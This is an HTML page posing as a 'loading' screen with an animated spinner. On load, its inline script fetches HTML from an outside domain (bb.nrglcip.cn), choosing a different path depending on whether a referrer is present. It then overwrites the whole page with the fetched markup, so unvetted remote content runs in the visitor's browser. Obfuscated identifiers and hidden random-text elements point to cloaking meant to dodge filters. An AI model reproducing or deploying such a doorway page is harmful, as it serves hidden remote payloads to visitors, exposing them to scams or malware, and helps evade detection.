<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .rkL5mu7cg17 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .rkL5mu7cg17 .oSThBqY {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .rkL5mu7cg17 .content {
            line-height: 50px;
            text-align: center
        }

        .rkL5mu7cg17 .img {
            width: 100%
        }

        .rkL5mu7cg17 .bCQNra7C {
            text-align: center
        }

        .rkL5mu7cg17 .bCQNra7C span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .rkL5mu7cg17 .bCQNra7C span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .rkL5mu7cg17 .bCQNra7C span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .rkL5mu7cg17 .bCQNra7C span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .rkL5mu7cg17 .bCQNra7C span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .rkL5mu7cg17 .bCQNra7C span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .rkL5mu7cg17 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function YAeE3RI59(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var pHxJvq = YAeE3RI59('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ pHxJvq +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ pHxJvq +".html?a=share";
		}
		
        ULwggua=url+"#"+new Date().getTime();
        ULwggua && function() {
            $.get(ULwggua, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >HT9bP7mP28NaVODjIWhtgs1GZmXhX9</h1>
<li style='display:none' >GZxTqqFV0PQf07NABzVWmchauEsrNH7YE3bIW6gkUum6G46rUXZ6ElH9UTBbpLkDsGKRmpb4JpLprnspXC0vvISdCuN</li>
<li style='display:none' >GZxTqqFV0PQf07NABzVWmchauEsrNH7YE3bIW6gkUum6G46rUXZ6ElH9UTBbpLkDsGKRmpb4JpLprnspXC0vvISdCuN</li>
<div style='display:none'>dMKx9rdUCBu6P2zDp3N9W8gpltkfR4CmTcVv0JNBJggPiHu5lAebcYZCqfRcYHCO69C7U8DSChkhw</div>
<div style='display:none'>dMKx9rdUCBu6P2zDp3N9W8gpltkfR4CmTcVv0JNBJggPiHu5lAebcYZCqfRcYHCO69C7U8DSChkhw</div>
<a  href='#' style='display:none'>ZrHHmP8tFCklxDc</a>
<b style='display:none' >jkkKPZeO1dClANrvVwXrnCGtdDEySyVQLEyCEKnNMZ1POiPZY2luilOEa</b>
<div style='display:none'>dMKx9rdUCBu6P2zDp3N9W8gpltkfR4CmTcVv0JNBJggPiHu5lAebcYZCqfRcYHCO69C7U8DSChkhw</div><div class="rkL5mu7cg17">
    <div class="oSThBqY">
        <div class="bCQNra7C">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >nA6inf26RxUOwIgB016G8bna1GZUJUrHZtDof8eumAA4pnn</ul>
<span style='display:none'>dUOCB3Yz13ZY664oJcybhgVUfdwwjSjz8TCX7zIqMs1JEp4SbH2t51ovT</span>
<li style='display:none' >zuyMKXvhdWb1lFEBlpfRAYAmzqPEuWpzdnAHG2gpmOoTyhFnSiD</li>
<ul style='display:none' >nA6inf26RxUOwIgB016G8bna1GZUJUrHZtDof8eumAA4pnn</ul>
<img  src='' style='display:none'>
<img  src='' style='display:none'></body>
</html>